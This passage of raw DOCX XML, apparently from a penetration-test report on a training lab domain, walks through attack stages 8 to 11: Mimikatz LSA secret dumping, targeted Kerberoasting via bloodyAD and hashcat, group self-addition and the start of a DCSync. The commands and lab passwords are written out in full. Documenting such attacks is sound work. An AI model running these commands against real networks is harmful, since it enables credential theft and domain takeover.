              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6893F8EE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>mimikatz.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC1B3FB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>privilege::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>debug</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15226A3F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>token::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>elevate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64529FFE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>lsadump::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>secrets</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D0BA73" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Reveals: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DefaultUserName :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> mssqladm | DefaultPassword : DBAilfreight1!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4013822F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47760955" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9 and Figure 10 display the cleartext credential recovery of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>mssqladm :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> DBAilfreight1! from LSA registry memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1650EDEE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426E8554" wp14:editId="66F2B52A">
            <wp:extent cx="5907332" cy="24218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ault-user-o-mssqladmn.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5912753" cy="2424112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C47417" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 9: Registry Winlogon DefaultUserName Query Confirming mssqladm Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A66BC6" w14:textId="164EB033" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E278B2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63CA6260" wp14:editId="54CE296B">
            <wp:extent cx="5943600" cy="22686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z07.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2268661"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B816777" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10: Mimikatz </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lsadump::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>secrets Dumping Cleartext Password for mssqladm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6B2695" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.9 Stage 9: Targeted Kerberoasting via GenericWrite Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4009D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound analysis indicated that mssqladm held GenericWrite permissions over the user account ttimmons. Using bloodyAD, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> arbitrary Service Principal Name (SPN) was written to ttimmons ('acmetesting/LEGIT'), forcing it to become Kerberoastable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278862C0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="775A8DDF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36411FD1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD --host 172.16.8.3 -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u mssqladm -p 'DBAilfreight1!' set object ttimmons servicePrincipalName -v 'acmetesting/LEGIT'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6E5403" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GetUserSPNs.py -dc-ip 172.16.8.3 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/mssqladm -request-user ttimmons -outputfile ttimmons_tgs.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5299F50B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>hashcat -m 13100 ttimmons_tgs.txt /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68018CE9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E87ABE0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>The Kerberos TGS ticket for ttimmons was requested via Impacket GetUserSPNs.py and cracked offline using Hashcat (Mode 13100), revealing password 'Repeat09' (see Figure 11 and Figure 12).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9730F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F0B04B" wp14:editId="0BD34CEB">
            <wp:extent cx="5981622" cy="232410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sqladm-genericwrite-ontttim.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5988515" cy="2326778"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="121FF99E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 11: Targeted SPN Injection on ttimmons via bloodyAD GenericWrite Permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB7DCD7" w14:textId="66B64AE5" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00C6070F">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A64102D" wp14:editId="60D435EA">
            <wp:extent cx="5943600" cy="17355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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1735548"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA01804" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 12: Hashcat Offline TGS Ticket Cracking Recovering Password Repeat09 for ttimmons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C651A8" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.10 Stage 10: Privileged Group Self-Addition (Server Admins)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E376BC8" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>The newly compromised account ttimmons possessed GenericAll control over a custom security group named 'Server Admins'. Using bloodyAD, ttimmons added itself directly into the Server Admins group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E91A6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="22BDC4E8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48967DC6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD --host 172.16.8.3 -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u ttimmons -p 'Repeat09' add groupMember "Server Admins" ttimmons</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5063E10E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD --host 172.16.8.3 -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u ttimmons -p 'Repeat09' get object ttimmons --attr memberOf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6537C48E" w14:textId="7D65158E" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277C7858" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Figure 13 verifies that ttimmons successfully joined the Server Admins group, inheriting all associated extended rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D218C00" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="465F6F7E" wp14:editId="346F9934">
            <wp:extent cx="6546972" cy="246697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imons-on-serveradmin.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6552469" cy="2469046"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B04D981" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 13: Group Membership Query Confirming ttimmons Addition to Server Admins Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44190D4B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.11 Stage 11: DCSync Attack - Full Domain Credential Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FD183" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Root Cause Misconfiguration: The Server Admins group was granted extended directory replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) on the domain object. Utilizing Impacket secretsdump.py under the ttimmons identity, a DCSync attack was launched against DC01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB54B35" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
